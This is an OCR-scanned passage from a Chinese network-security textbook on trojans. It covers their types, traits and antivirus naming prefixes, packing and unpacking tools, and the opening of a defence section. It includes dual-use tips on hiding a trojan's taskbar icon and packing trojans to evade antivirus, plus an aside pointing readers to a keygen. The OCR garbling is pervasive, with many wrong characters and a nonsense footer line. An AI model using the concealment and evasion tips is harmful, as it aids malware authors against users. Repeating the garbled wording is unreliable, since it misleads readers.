其 他 计算 机 的 帮凶 。 由 于 后 门 是 隐藏 在 系统 背后 运行 的 ， 因 此 很 难 被 检测 到 。 它 们 不 像 病 
毒 和 蠕虫 那样 通过 消耗 内 存 而 引起 注意 。 

(2) 添加 了 击 键 记录 功能 。 

从 名 称 上 就 可 以 知道 ， 该 功能 主要 是 记录 用 户 所 有 的 击 刍 内容， 然后 形成 击 键 记录 的 
日 志文 件 发 送 给 恶意 用 户 。 恶意 用 户 可 以 从 中 找到 用 户 名 、 口令 以 及 信用 卡号 等 用 户 信 息 。 
这 一 代 木 马 比较 有 名 的 有 国外 的 BO2000(BackOrifice) 和 国内 的 冰河 木马 。 它 们 有 如 下 共同 
特点 : 基于 网 络 的 客户 端 / 服 务 器 应 用 程序 具有 搜集 信息 、 执 行 系统 命令 、 重 新 设置 机 器 、 
重新 定向 等 功能 。 当 木马 程序 攻击 得 手 后 ， 计 算 机 就 完全 成 了 受 黑 客 控制 的 倪 介 主 机 ， 黑 
客 成 了 超级 用 户 ， 用 户 的 所 有 计算 机 操作 不 但 没有 任何 秘密 而 言 ， 而 且 黑 客 可 以 远程 控制 
倪 儒 主 机 对 别 的 主机 发 动 攻击 ， 这 时 候 背 俘获 的 倪 儒 主机 成 了 黑客 进行 进一步 攻击 的 挡 箭 
牌 和 跳板 。 
虽然 木马 程序 手段 越 来 越 隐 蔽 ,但 是 苍蝇 不 叮 无 颖 的 蛋 ， 只 要 加 强 个 人 安全 防范 意识 ， 
还 是 可 以 大 大 降低 “中 招 ” 的 几率 。 对 此 建议 用 户 : 安装 个 人 防 病毒 软件 、 个 人 防火 墙 软 
件 ; 及 时 安装 系统 补丁 ; 对 不 明 来 历 的 电子 邮件 和 插件 不 予 理 皮 ; 经 常 去 安全 网 站 转 一 转 ， 
以 便 及 时 了 解 一 些 新 木马 的 底细 ， 做 到 知己 知 彼 ， 百 战 不 至。 


4.4.3 ”木马 的 分 类 


1. 网 络 游戏 木马 
随 着 网 络 在 线 游戏 的 普及 和 升温 , 我国 拥 有 规模 庞大 的 网 游玩 家 。 网 络 游戏 中 的 金钱 、 
装备 等 虚拟 财富 与 现实 财富 之 间 的 界限 越 来 越 模糊 。 与 此 同时 ， 以 盗 取 网 游 账号 密码 为 目 
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的 的 木马 病毒 也 随 之 发 展 泛滥 起 来 。 

网 络 游戏 木马 通常 采用 记录 用 户 键盘 输入 .Hook 游戏 进程 API 函数 等 方法 获取 用 户 的 
密码 和 账号 。 窃 取 到 的 信息 一 般 通 过 发 送 电子 邮件 或 向 远程 脚本 程序 提交 的 方式 发 送 给 木 
马 作者 。 

网 络 游戏 木马 的 种 类 和 数量 ， 在 国产 木马 病毒 中 都 首届 一 指 。 流 行 的 网 络 游戏 都 受到 
了 不 同 程度 网 游 森马 的 威胁 。 一 款 新 游戏 正式 发 布 后 ,往往 在 1 一 2 个 星期 内 ， 就 会 有 相应 
4 木马 程序 被 制作 出 来 。 大 量 的 森马 生成 器 和 黑客 网 站 的 公开 销售 也 是 网 游 木马 泛滥 的 原 
因 之 一 。 

2. 网 银 木马 


网 银 木 马 是 针对 网 上 交易 系统 编写 的 木马 病毒 ， 其 目的 是 盗 取 用 户 的 卡号 、 密 码 ， 甚 
至 安全 证 书 。 此 类 木马 种 类 数量 虽然 比 不 上 网 游 木马 ， 但 它 的 危害 更 加 直接 ， 受 害 用 户 的 
损失 更 加 惨重 。 

网 银 木 马 通 常 针 对 性 较 强 , 木马 作者 可 能 首先 对 某 银行 的 网 上 交易 系统 进行 仔细 分 析 ， 
然后 针对 安全 薄弱 环节 编写 病毒 程序 。 如 2004 年 的 “网 银 大 盗 ” 病 毒 ， 在 用 户 进入 工行 网 
银 登 录 页 面 时 ， 会 自动 把 页 面 换 成 安全 性 能 较 差 ， 但 依然 能 够 运转 的 老 版 页 面 ， 然 后 记录 
用 户 在 此 页 面 上 填写 的 卡号 和 密码 ; “网 银 大 盗 3” 利 用 招行 网 银 专业 版 的 备份 安全 证 书 
功能 ， 可 以 盗 取 安全 证 书 :2005 年 的 “新 网 银 大 盗 ”， 采 用 API Hook 等 技术 干扰 网 银 登 
录 安 全 控件 的 运行 。 随 着 我 国 网 上 交易 的 普及 ， 受 到 外 来 网 银 木马 威胁 的 用 户 也 在 不 断 
增加 。 

3. 即时 通讯 软件 木马 

现在 ， 国 内 即时 通讯 软件 百花 齐 放 。QQ、 新 浪 UC、 网 易 泡 泡 、 盛 大 圈 圈 等 等 ， 网 上 
聊天 的 用 户 群 十 分 庞大 。 常 见 的 即时 通讯 类 木马 一 般 有 3 种 : 

(1) 发 送 消息 型 。 通 过 即时 通讯 软件 自动 发 送 含有 恶意 网 址 的 消息 ， 目 的 在 于 让 收 到 
消息 的 用 户 点 击 网 址 中 毒 。 此 类 病毒 常用 技术 是 搜索 聊天 窗口 ， 进 而 控制 该 窗口 自动 发 送 
文本 内 容 。 发 送 消息 型 木马 常常 充当 网 游 木马 的 广告 ， 如 “武汉 男生 2005” 木 马 ， 可 以 通 
过 MSN、QQ、UC 等 多 种 聊天 软件 发 送 带 毒 网 址 ， 其 主要 功能 是 盗 取 传 奇 游戏 的 账号 和 
密码 。 

(2) 盗号 型 。 主 要 目标 在 于 盗 取 即 时 通讯 软件 的 登录 账号 和 密码 。 工 作 原 理 和 网 游 木 
马 类 似 。 病 毒 作者 盗 得 他 人 账号 后 ， 可 能 偷窥 聊天 记录 等 隐私 内 容 ， 或 将 账号 卖 掉 。 

(3) 传播 自身 型 。2005 年 初 ，“MSN 性 感 鸡 ”等 通过 MSN 传播 的 蠕虫 泛滥 了 一 阵 之 
后 ，MSN 推出 新 版 本 ， 禁 止 用 户 传送 可 执行 文件 。2005 年 上 半年 ，“QQ 旬 ”和 “QQ 爱 
虫 ”这 两 个 国产 病毒 通过 QQ 聊天 软件 发 送 自身 进行 传播 ， 感 染 用 户 数量 极 大 。 它 对 聊天 
窗口 进行 控制 ， 来 达到 发 送 文件 或 消息 的 目的 。 

4. 网 页 点 击 类 木马 


网 页 点 击 类 木马 会 恶意 模拟 用 户 点 击 广告 等 动作 ， 在 短 时 间 内 可 以 产生 数 以 万 计 的 点 
击 量 。 病 毒 作 者 的 编写 目的 一 般 是 为 了 赚 取 高 额 的 广告 推广 费用 。 此 类 病毒 的 技术 简单 ， 
一 般 只 是 向 服务 器 发 送 HTTP GET 请 求 。 
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5. 下 载 类 木马 

这 种 木马 程序 的 体积 一 般 很 小 , 其 功能 是 从 网 络 上 下 载 其 他 病毒 程序 或 安装 广告 软件 。 
由 于 体积 很 小 ， 下 载 类 木马 更 容易 传播 ， 传 播 速度 也 更 快 。 通 常 功 能 强大 、 体 积 也 很 大 的 
后 门类 病毒 ， 如 “ 灰 蚀 子 ”、“ 黑 洞 ”等 ， 传 播 时 都 单独 编写 一 个 小 巧 的 下 载 型 木马 ， 用 
户 中 毒 后 会 把 后 门 主 程序 下 载 到 本 机 运行 。 

6. 代理 类 木马 


用 户 感 当代 理 类 木马 后 ， 会 在 本 机 开启 HITP、SOCKS 等 代理 服务 功能 。 黑 客 把 受 感 
染 计算 机 作为 跳板 ， 以 被 感染 用 户 的 身份 进行 黑客 活动 ， 达 到 隐藏 自己 的 目的 。 

一 般 来 说 一 种 杀毒 软件 程序 ， 它 的 木马 专 杀 程 序 能 够 查 杀 某 某 木马 的 话 ， 那 么 它 自己 
的 普通 杀毒 程序 也 当然 能 够 杀 掉 这 种 木马 ， 因 为 在 木马 泛滥 的 今天 ， 为 木马 单独 设计 一 个 
专门 的 木马 查 杀 工 具 ， 是 能 提高 该 杀毒 软件 的 产品 档次 的 ， 对 其 声誉 也 会 大 大 有 益 ， 实 际 
上 一 般 的 普通 杀毒 软件 里 都 包含 了 对 木马 的 查 杀 功能 。 如 果 现 在 大 家 说 某 某 杀 毒 软 件 没有 
木马 专 杀 的 程序 ， 那 这 家 杀毒 软件 厂商 自己 也 好 像 有 点 过 意 不 去 ， 即 使 它 是 普通 杀毒 软件 
也 必须 要 有 杀 除 木马 的 功能 。 

还 有 一 点 就 是 ， 把 查 杀 木 马 程序 单独 剥离 出 来 ， 可 以 提高 查 杀 效率 ， 现 在 很 多 杀毒 软 
件 里 的 木马 专 杀 程序 只 对 木马 进行 查 杀 ， 不 去 检查 普通 病毒 库 里 的 病毒 代码 ， 也 就 是 说 当 
用 户 运行 木马 专 杀 程序 的 时 候 ， 程 序 只 调用 木马 代码 库 里 的 数据 ， 而 不 调用 病毒 代码 库 里 
的 数据 ， 大 大 提高 木马 查 杀 速度 。 我 们 知道 查 杀 普 通病 毒 的 速度 是 比较 慢 的 ， 因 为 现在 有 
太 多 的 病毒 。 每 个 文件 要 经 过 几 万 条 木马 代码 的 检验 , 然后 再 加 上 已 知 的 差不多 有 近 10 万 
个 病毒 代码 的 检验 ， 那 速度 岂 不 是 很 慢 了 。 省 去 普通 病毒 代码 检验 ， 是 不 是 就 提高 了 效率 ， 
提高 了 速度 呢 ? 也 就 是 说 现在 很 多 杀毒 软件 自 带 的 木马 专 杀 程序 只 查 杀 木 马 而 一 般 不 去 查 
杀 病 毒 ， 但 是 它 自身 的 普通 病毒 查 杀 程 序 既 查 杀 病毒 又 查 杀 木 马 ! 


4.4.4 ”木马 的 特征 


木马 和 病毒 都 是 一 种 人 为 的 程序 ， 都 属于 电脑 病毒 ， 为 什么 木马 要 单独 提出 来 说 呢 ? 
大 家 都 知道 以 前 的 电脑 病毒 的 作用 ， 其 实 完 全 就 是 为 了 搞 破坏 ， 破 坏 电脑 里 的 资料 数据 ， 
除了 破坏 之 外 其 他 无 非 就 是 有 些 病 毒 制造 者 为 了 达到 某 些 目的 而 进行 的 威慑 向 诈 勒索 的 
作用 ， 或 为 了 炫耀 自己 的 技术 。“ 木 马 ”不 一 样 ， 木 马 的 作用 是 赤裸 宰 的 偷偷 监 视 别人 和 
盗 穷 别人 的 密码 、 数 据 等 ， 如 盗 窗 管 理 员 密码 - 子 网 密码 搞 破坏 或 者 好 玩 ， 偷 窃 上 网 密码 用 
于 它 用 ， 偷 窗 游 戏 账号 、 股 票 账号 甚至 网 银 账户 等 ， 以 达到 偷 宕 别人 隐私 和 得 到 经 济 利益 
的 目的 。 所 以 木马 的 功能 比 早期 的 电脑 病毒 更 加 强大 ， 更 容易 直接 达到 使 用 者 的 目的 ! 导 
致 许多 别有用心 的 程序 开发 者 大 量 的 编写 这 类 带 有 偷 窍 和 监视 别人 电脑 的 侵入 性 程序 ， 这 
就 是 目前 网 上 木马 泛 洲 成 灾 的 原因 。 鉴 于 木马 的 这 些 巨大 危害 性 和 它 与 早期 病毒 的 作用 性 
质 不 一 样 ， 所 以 木马 虽然 属于 病毒 中 的 一 类 ， 但 是 要 单独 的 从 病毒 类 型 中 剂 离 出 来 ， 独 立 
地 称 为 “木马 ”程序 。 

木马 的 特征 具体 体现 在 以 下 几 方 面 。 
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隐蔽 性 

木马 必须 隐藏 在 系统 之 中 ， 它 会 想 尽 一 切 办 法 不 让 用 户 发 现 它 。 很 多 人 对 木马 和 远程 
控制 软件 有 点 分 不 清 ， 因 为 木马 程序 要 通过 木马 程序 驻 留 目 标 机 器 后 ， 通 过 远程 控制 功能 
控制 目标 机 器 。 

木马 的 隐蔽 性 主要 体现 在 以 下 两 个 方面 。 

(1) 不 产生 图 标 。 它 虽然 在 用 户 系统 启动 时 会 自动 运行 ， 但 它 不 会 在 任务 栏 中 产生 一 
个 图 标 。 要 想 在 任务 栏 中 隐藏 图 标 ， 上 5 oi Form 的 Visible 属性 设置 
为 False、 把 ShowintaskBar 属性 设置 为 False 即 可 。 

(2) 木马 程序 自动 在 任务 管理 器 中 隐藏 ， 并 以 “系统 服务 ”的 方式 欺骗 操作 系统 。 

2. 自动 运行 性 

木马 是 一 个 当 系统 启动 时 即 自 动 运行 的 程序 ， 所 以 它 必 须 潜入 在 用 户 的 启动 配置 文件 
中 ， 如 win.ini、system.ini、winstartbat 以 及 启动 组 等 文件 之 中 。 

3. 欺骗 性 

木马 程序 要 达到 其 长 期 隐蔽 的 目的 ， 就 必须 借助 系统 中 已 有 的 文件 ， 以 防 被 发 现 ， 它 
经 常 使 用 的 是 常见 的 文件 名 或 扩展 名 ， 如 “dll\winvsys\explorer” 等 字样 ， 或 者 仿制 一 些 不 
易 被 人 区 别 的 文件 名 ， 如 字母 “1” 与 数字 “1”、 字 母 “o” 与 数字 “0”， 常 修改 基本 文 
件 中 的 这 些 难以 分 辨 的 字符 ， 有 的 甚至 借用 系统 文件 中 已 有 的 文件 名 ， 只 不 过 它 保存 在 不 
同 路 径 之 中 。 还 有 的 木马 程序 为 了 隐藏 自己 ， 也 常 把 自己 设置 成 一 个 ZIP 文件 式 图 标 ， 当 
用 户 一 不 小 心 打开 它 时 ， 它 就 马上 运行 。 那 些 编制 木马 程序 的 人 还 在 不 断 地 研究 、 发 掘 ， 
总 之 是 越 来 越 隐蔽 、 越 来 越 专业 ， 所 以 有 人 称 木 马 程序 为 “骗子 程序 ”。 

4. 自动 恢复 

现在 很 多 的 木马 程序 中 的 功能 模块 已 不 再 是 由 单一 的 文件 组 成 ， 而 是 具有 多 重 备份 ， 
可 以 相互 恢复 。 

5. 自动 打开 特别 的 端口 

木马 程序 潜入 电脑 之 中 的 目的 不 但 是 为 了 破坏 用 户 的 系统 ， 更 是 为 了 获取 用 户 的 系统 
中 有 用 的 信息 ， 这 样 就 必须 当 用 户 上 网 时 能 与 远 端 客户 进行 通讯 ， 这 样 木马 程序 就 会 用 服 
务 器 /客户 端的 通讯 手段 把 信息 告诉 黑客 们 ， 以 便 黑客 们 控制 用 户 的 机 器 ， 或 实施 进一步 入 
侵 的 企图 。 根据 TCP/IP 协议 , 每 台电 脑 可 以 有 从 0 到 65535 号 门 , 但 常用 的 只 有 少数 儿 个 ， 
有 这 么 多 门 可 以 进 ， 黑 客 怎 能 进 不 来 ? 

6. 功能 的 特殊 性 

通常 的 木马 的 功能 都 是 十 分 特殊 的 ， 除 了 普通 的 文件 操作 以 外 ， 还 有 些 木马 具有 搜索 
cache 中 的 口令 、 设 置 口令 、 扫 描 目标 机 器 的 卫 地 址 、 进 行 键盘 记录 、 远 程 注册 表 的 操作 
以 及 锁定 鼠标 等 功能 

7. 黑客 组 织 趋 于 公开 化 


黑客 组 织 不 但 拥有 自己 的 网 站 ， 而 且 在 网 上 大 肆 招 兵 买 马 ， 让 人 觉得 黑客 组 织 已 经 合 
法 化 了 。 而 黑客 组 织 也 自称 分 成 正 那 两 派 : 正派 为 黑客 ， 那 派 叫 骇 客 。 那 派 当 然 是 一 个 犯 
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罪 活动 的 组 织 了 ， 而 正派 则 会 自觉 捍卫 国家 利益 。 
4.5 木马 的 攻击 防护 技术 


在 网 络 信息 系统 中 ， 木 马 由 于 其 隐蔽 性 、 远 程 可 植 入 性 和 可 控制 性 等 特点 ， 已 成 为 黑 
客 攻 击 或 不 法 分 子 入 侵 或 控制 他 人 网 络 或 计算 机 系统 的 重要 工具 。 


4.5.1 常见 木马 的 应 用 


1. 系统 病毒 


系统 病毒 的 前 级 为 :， Win32、PE、Win9X、W32、W95 等 。 这 些 病毒 一 般 公 有 的 特性 
是 可 以 感染 Windows 操作 系统 的 *.exe 和 *.dll 文件 ， 并 通过 这 些 文件 进行 传播 ， 如 CIH 
病毒 。 

2. 蠕虫 病毒 

蠕虫 病毒 的 前 级 是 Worm。 这 种 病毒 的 共有 特性 是 通过 网 络 或 者 系统 漏洞 进行 传播 ， 
大 部 分 的 蠕虫 病毒 都 有 向 外 发 送 带 毒 邮 件 、 阻 塞 网 络 的 特性 。 比 如 冲击 波 (阻塞 网 络 )， 小 
邮差 (发 带 毒 邮件 ) 等 。 

3. 木马 病毒 、 黑 客 病 毒 

木马 病毒 的 前 级 是 Trojan， 黑 客 病毒 前 绥 名 一 般 为 Hack。 木 马 病毒 的 共有 特性 是 通过 
网 络 或 者 系统 漏洞 进入 用 户 的 系统 并 隐藏 ， 然 后 向 外 界 泄露 用 户 的 信息 ， 而 黑客 病毒 则 有 
一 个 可 视 的 界面 ， 能 对 用 户 的 电脑 进行 远程 控制 。 木 马 、 黑 客 病 毒 往往 是 成 对 出 现 的 ， 即 
木马 病毒 负责 侵入 用 户 的 电脑 ， 而 黑客 病毒 则 会 通过 该 木马 病毒 来 进行 控制 。 现 在 这 两 种 
类 型 越 来 越 趋 向 于 整合 了 。 一 般 的 木马 如 QQ 消息 尾巴 木马 Trojan.QQ3344, 还 有 大 家 可 能 
遇见 比较 多 的 针对 网 络 游戏 的 木马 病毒 如 Trojan.LMir.PSW.60。 

4. 脚本 病毒 

脚本 病毒 的 前 级 是 Script。 脚本 病毒 的 共有 特性 是 使 用 脚本 语言 编写 , 通过 网 页 进行 传 
播 ， 如 “红色 代码 ”(ScriptRedlobD。 脚 本 病毒 还 会 有 如 下 前 绥 : VBS、JS( 表 明 是 何 种 脚本 
编写 的 )， 如 “欢乐 时 光 ”(VBS.Happytime)、“ 十 四 日 ”(Js.Fortnight.c.s) 等 。 

5. 宏 病 毒 

其 实 宏 病 毒 是 也 是 脚本 病毒 的 一 种 ， 由 于 它 的 特殊 性 ， 因 此 在 这 里 单独 算 成 一 类 。 宏 
病毒 的 前 级 是 Macro， 第 二 前 级 是 Word、Word 97、Excel、Excel 97( 也 许 还 有 别 的 ) 其 中 之 
一 。 凡 是 只 感染 Word 97 及 以 前 版 本 Word 文档 的 病毒 采用 Word 97 作为 第 二 前 级 ， 格 式 
是 Macro.Word 97; 凡是 只 感染 Word 97 以 后 版 本 Word 文档 的 病毒 采用 Word 作为 第 二 前 
级 ， 格 式 是 Macro.Word; 凡是 内 感染 Excel 97 及 以 前 版 本 Excel 文档 的 病毒 采用 Excel 97 
作为 第 二 前 级 , 格式 是 Macro Excel 97; 凡是 只 感染 Excel 97 以 后 版 本 Excel 文档 的 病毒 采 
用 Excel 作 为 第 二 前 级 ,格式 是 Macro.Excel, 依 此 类 推 。 该 类 病毒 的 共有 特性 是 能 感染 Office 
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系列 文档 ， 然 后 通过 Office 通用 模板 进行 传播 ， 如 : “著名 的 美丽 莎 ”(Macro.Melissa) 。 
6. 后 门 病毒 


后 门 病毒 的 前 级 是 Backdoor。 该 类 病毒 的 共有 特性 是 通过 网 络 传播 ， 给 系统 开 后 门 ， 
给 用 户 计算 机 带 来 安全 隐患 。 如 很 多 朋友 遇 到 过 的 人 RC 后 门 Backdoor.IRCBot。 


7. 病毒 种 植 程序 病毒 

病毒 种 植 程序 病毒 的 前 级 是 Dropper。 这 类 病毒 的 共有 特性 是 运行 时 会 从 体内 释放 出 一 
个 或 几 个 新 的 病毒 到 系统 目录 下 ， 由 释放 出 来 的 新 病毒 产生 破坏 。 如 : “冰河 播种 者 ” 
(Dropper.BingHe2.2C)、“MSN 射手 ”(Dropper Worm.Smibag) 等 。 

8. 破坏 性 程序 病毒 

破坏 性 程序 病毒 的 前 级 是 Harm。 这 类 病毒 的 共有 特性 是 本 身 具 有 好 看 的 图 标 来 诱惑 用 
户 点 击 ， 当 用 户 点 击 这 类 病毒 时 ， 病 毒 便 会 直接 对 用 户 计算 机 产生 破坏 。 如 : “格式 化 C 
盘 ”(Harm.formatC.f)、“ 杀 手 命令 ”(Harm.Command.Killer) 等 。 

9. 玩笑 病毒 

玩笑 病毒 的 前 级 是 Joke， 该 病毒 也 称 恶 作 剧 病毒 。 这 类 病毒 的 共有 特性 是 本 身 具 有 好 
看 的 图 标 来 诱惑 用 户 点 击 ， 当 用 户 点 击 这 类 病毒 时 ， 病 毒 会 做 出 各 种 破坏 操作 来 吓 距 用 户 ， 
其 实 病毒 并 没有 对 用 户 电脑 进行 任何 破坏 。 如 : “ 女 鬼 ”(Joke.Girlghost) 病 毒 。 

10. 捆绑 机 病毒 

捆绑 机 病毒 的 前 级 是 Binder。 这 类 病毒 的 共有 特性 是 病毒 作者 会 使 用 特定 的 捆绑 程序 
将 病毒 与 一 些 应 用 程序 如 QQ、 正 捆绑 起 来 ， 表 面 上 看 是 一 个 正常 的 文件 ， 当 用 户 运 行 这 
些 捆绑 病毒 时 ， 会 表面 上 运行 这 些 应 用 程序 ， 然 后 隐藏 运行 捆绑 在 一 起 的 病毒 ， 从 而 给 用 
户 造成 危害 。 如 : “捆绑 QQ”(Binder.QQPass.QQBin)、“ 系统 杀手 ”(Binder.killsys) 等 。 


4.5.2 ”木马 的 加 壳 与 脱 壳 


1. 什么 是 加 壳 

加 壳 一 般 是 指 保护 程序 资源 的 方法 。 软 件 加 过 是 作者 写 完 软件 后 ， 为 了 保护 自己 的 代 
码 或 维护 软件 产权 等 利益 所 常用 到 的 手段 。 作 者 编 好 软件 后 ， 编 译 成 exe 可 执行 文件 。 

例如 : 

(1) 有 一 些 版 权 信息 需要 保护 起 来 ， 不 想 让 别人 随便 改动 ， 如 作者 的 姓名 ， 即 为 了 保 
护 软 件 不 被 破解 ， 通 常 都 是 采用 加 壳 来 进行 保护 。 

(2) 需要 把 程序 和 弄 得 小 一 点 ， 从 而 方便 使 用 。 于 是 ， 需 要 用 到 一 些 软件 ， 它 们 能 将 exe 
可 执行 文件 压缩 。 

(3) 在 黑客 界 给 木马 等 软件 加 壳 脱 壳 以 躲避 杀毒 软件 。 

2. 加 壳 软件 

(1) 最 常见 的 加 壳 软 件 有 ASPACK、UPX、Pecompact。 

(2) 侦 测 壳 的 软件 fleinfo.exe 简称 f.exe( 侦 测 壳 的 能 力 极 强 )。 
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(3) 侦 测 这 和 软件 所 用 编写 语言 的 软件 language.exe， 推 荐 language2000 中 文 版 (专门 
检测 加 壳 类 型 )。 

(4) 软件 常用 编写 语言 Delphi，Visual Basic(VB)，VisualC(VC)。 

3. 脱 壳 

脱 壳 一 般 是 指 除 掉 程 序 的 保护 ， 用 来 修改 程序 资源 。 目 前 有 很 多 加 这 工具 ， 当 然 有 盾 ， 
自然 就 有 予 ， 只 要 我 们 收集 全 常用 脱 壳 工具 ， 那 就 不 怕 他 加 过 了 。 

现在 脱 壳 一 般 分 手动 脱 壳 和 自动 脱 壳 两 种 , 手动 脱 过 就 是 用 TRW2000、TR、SOFTICE 
等 调试 工具 对 付 ， 对 脱 壳 者 有 一 定 的 水 平 要 求 , 涉及 很 多 汇编 语言 和 软件 调试 方面 的 知识 。 
而 自动 脱 壳 就 是 用 专门 的 脱 壳 工具 来 脱 , 最 常用 的 压缩 软件 都 有 他 人 写 的 反 压 缩 工 具 对 应 : 
有 些 压 缩 工 具 自身 能 解压 ,如 UPX; 有 些 不 提供 这 项 功能 , 如 ASPACK, 就 需要 UNASPACK 
对 付 ， 好 处 是 简单 ， 缺 点 是 版 本 更 新 了 就 没 用 了 。 最 流行 的 脱 过 工具 是 PROCDUMP， 可 
对 付 目 前 各 种 压缩 软件 的 压缩 档 。 在 这 里 介绍 的 是 一 些 通用 的 方法 和 工具 ， 希 望 对 大 家 有 
帮助 。 我 们 知道 文件 的 加 密 方式 ， 就 可 以 使 用 不 同 的 工具 和 方法 进行 脱 壳 。 

下 面 是 我 们 常常 会 磁 到 的 加 壳 方 式 及 简单 的 脱 壳 措施 ， 供 大 家 参考 : 脱 壳 的 基本 原则 
就 是 单 步 跟踪 ,只 能 往 前 , 不 能 往 后 。 脱 壳 的 一 般 流 程 是 : 查 壳 一 寻找 OEP 一 Dump 一 修复 。 
找 OEP 的 一 般 思路 如 下 : 先 看 这 是 加 密 过 还 是 压缩 过， 压缩 过 相对 来 说 容易 些 ， 一 般 是 没 
有 异常 ， 找 到 对 应 的 popad 后 就 能 找到 入 口 。 我 们 知道 文件 被 一 些 压 缩 加 过 软件 加 密 ， 下 

- 步 我 们 就 要 分 析 加 密 软 件 的 名 称 、 版 本 。 因 为 不 同 软件 甚至 不 同 版 本 加 的 这， 脱 壳 处理 
的 方法 都 不 相同 。 

常用 脱 壳 工具 如 下 。 

(1) 文件 分 析 工 具 ( 侦 测 壳 的 类 型 ); Fi、GetTyp、peid、pe-scan。 

(2) OEP 入 口 查找 工具 : SoftICE、TRW、ollydbg、loader、peid。 

(3) dump 工具 : IceDump、TRW、PEditor、ProcDump32、LordPE。 

(4) PE 文件 编辑 工具 : PEditor、ProcDump32、LordPE。 

(5) 重建 Import Table 工具 : ImportREC、ReVirgin。 

(6) ASProtect 脱 壳 专用 工具 : Caspr( 只 对 ASPr V1.1-V1.2 有 效 )、Rad( 只 对 ASPr V1.1 
有 效 )、loader、peid。 

常用 加 过 对 应 的 脱 壳 工具 如 下 。 

(1) Aspack: 用 的 最 多 ， 但 只 要 用 UNASPACK 或 PEDUMP32 脱 壳 就 行 了 。 

(2) ASProtecttaspack : 次 之 ， 国 外 的 软件 多 用 它 加 这， 脱 壳 时 需要 用 到 
SOFTICE+ICEDUMP， 需 要 一 定 的 专业 知识 ， 但 最 新 版 现在 暂时 没有 办 法 。 

(3) Upx: 可 以 用 UPX 本 身 来 脱 壳 ， 但 要 注意 版 本 是 否 一 致 ， 用 -D 参数 。 

(4) Armadill: 可 以 用 SOFTICE+ICEDUMP 脱 壳 。 

(5) Dbpe: 国内 比较 好 的 加 密 软 件 ， 新 版 本 暂时 不 能 脱 ， 但 可 以 破解 。 

(6) NeoLite: 可 以 用 自己 来 脱 壳 。 

(7) Pcguard: 可 以 用 SOFTICE+ICEDUMP+FROGICE 来 脱 壳 。 

(8) Pecompat: 用 SOFTICE 配合 PEDUMP32 来 脱 壳 ， 但 不 要 专业 知识 。 

(9) Petite: 有 一 部 分 的 老 版 本 可 以 用 PEDUMP32 直接 脱 壳 ， 新 版 本 脱 壳 时 需要 用 到 


@ 


(全 > 计算 机 网 络 安全 


说 洲 若 粹 于 ”十 洪 从 益 上 疾 作 巴 强 巴 


SOFTICE+ICEDUMP， 需 要 一 定 的 专业 知识 。 

(10) WWpack32: 和 PECOMPACT 一 样 其 实 有 一 部 分 的 老 版 本 可 以 用 PEDUMP32 直 
接 脱 壳 ， 不 过 有 时 候 资源 无 法 修改 ， 也 就 无 法 汉化 ， 所 以 最 好 还 是 用 SOFTICE 配合 
PEDUMP32 脱 壳 。 

我 们 通常 都 会 使 用 Procdump32 这 个 通用 脱 壳 软件 , 它 是 一 个 强大 的 脱 壳 软 件 , 它 可 以 
解 开 绝 大 部 分 的 加 密 外 壳 ， 还 有 脚本 功能 可 以 使 用 脚本 轻松 解 开 特定 外 这 的 加 密 文 件 。 另 
外 很 多 时 候 我 们 要 用 到 exe 可 执行 文件 编辑 软件 ultraedit。 也 可 以 下 载 它 的 汉化 注册 版 本 ， 
它 的 注册 机 可 从 网 上 搜 到 。ultraedit 打开 一 个 中 文 软件 ， 若 加 壳 ， 许 多 汉字 不 能 被 认 出 。 
ultraedit 打开 一 个 中 文 软件 ， 若 未 加 过 或 已 经 脱 过 ， 许 多 汉字 能 被 认 出 。ultraedit 可 用 来 检 
验 壳 是 否 脱 掉 。 例 如 ， 可 用 它 的 蔡 换 功能 蔡 换 作者 的 姓名 为 你 的 姓名 ,注意 字 节 必须 相等 ， 
两 个 汉字 替 两 个 、 三 个 汉字 替 三 个 ， 不 足 处 在 ultraedit 编辑 器 左边 用 00 补 。 

常见 的 脱 壳 法 : 

(1) aspack 壳 ， 脱 壳 可 用 unaspack 或 caspr。 

@ Unaspack: 


早 些 时 候 版 本 的 过 ， 不 能 脱 高 版 本 的 过 。 

@@ caspr 

第 一 种 : 待 脱 壳 的 软件 (如 aa.exe) 和 caspr.exe 位 于 同一 目录 下 ， 执 行 Windows 起 始 菜 
单 的 运行 ， 输 入 caspr aa.exe 脱 过 后 的 文件 为 aa.ex_， 删 掉 原 来 的 aa.exe， 将 aa.ex 改名 为 
aa.exe 即 可 。 优 点 : 可 以 脱 aspack 任何 版 本 的 壳 ， 脱 壳 能 力 极 强 。 缺 点 : DOS 界面 。 

第 二 种 : 将 aa.exe 的 图 标 拖 到 caspr.exe 的 图 标 上 。 若 已 侦 测 出 是 aspack 这, 用 unaspack 
脱 壳 出 错 ， 说 明 是 aspack 高 版 本 的 过， 用 caspr 脱 即 可 。 

(2) upx 壳 ， 脱 壳 可 用 upx。 

待 脱 壳 的 软件 (如 aa.exe) 和 upx.exe 位 于 同一 目录 下 ， 执 行 Windows 起 始 菜单 的 运行 ， 
输入 upx -d aa.exe。 

(3) PEcompact 壳 ， 脱 壳 用 unpecompact。 

使 用 方法 类 似 lanuage 傻瓜 式 软件 ， 运 行 后 选取 待 脱 壳 的 软件 即 可 。 

(4) procdump 万 能 脱 壳 但 不 精 ， 一 般 不 要 用 。 

使 用 方法 : 运行 后 ， 先 指定 壳 的 名 称 ， 再 选 定 欲 脱 壳 软件 ， 确 定 即 可 脱 壳 后 的 文件 大 
于 原文 件 。 由 于 脱 壳 软件 很 成 熟 ， 手 动 脱 壳 一 般 用 不 到 。 


4.5.3 ”木马 的 防范 


首先 必须 知道 木马 到 底 是 如 何 被 植 入 系统 的 ， 才 能 采取 相应 的 防范 措施 。 攻 击 者 要 利 
用 木马 攻击 系统 ， 一 般 的 步骤 就 是 要 把 木马 服务 器 端的 程序 植 入 到 目标 系统 。 其 方法 有 
三 种 : 

(1) 下 载 软件 : 木马 的 服务 器 端 程序 非常 小 ， 几 字 节 到 几 十 字 节 不 等 ， 把 木马 用 EXE 
捆绑 机 捆绑 起 来 可 谓 轻而易举 ， 而 且 不 易 引 起 怀疑 。 有 些 网 站 所 提供 的 软件 当中 就 有 可 能 
捆绑 木马 程序 。 当 用 户 下 载 并 且 执行 了 该 文件 以 后 ， 木 马 程序 也 相应 地 被 激活 了 。 
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(2) 交换 脚本 : 众所周知 ， 微 软 的 浏览 器 在 执行 Script 脚本 上 存在 一 些 漏洞 ， 攻 击 者 
可 以 利用 这 些 漏 洞 传播 病毒 和 木马 ， 甚 至 可 以 直接 对 浏览 者 电脑 进行 文件 操作 等 控制 。 
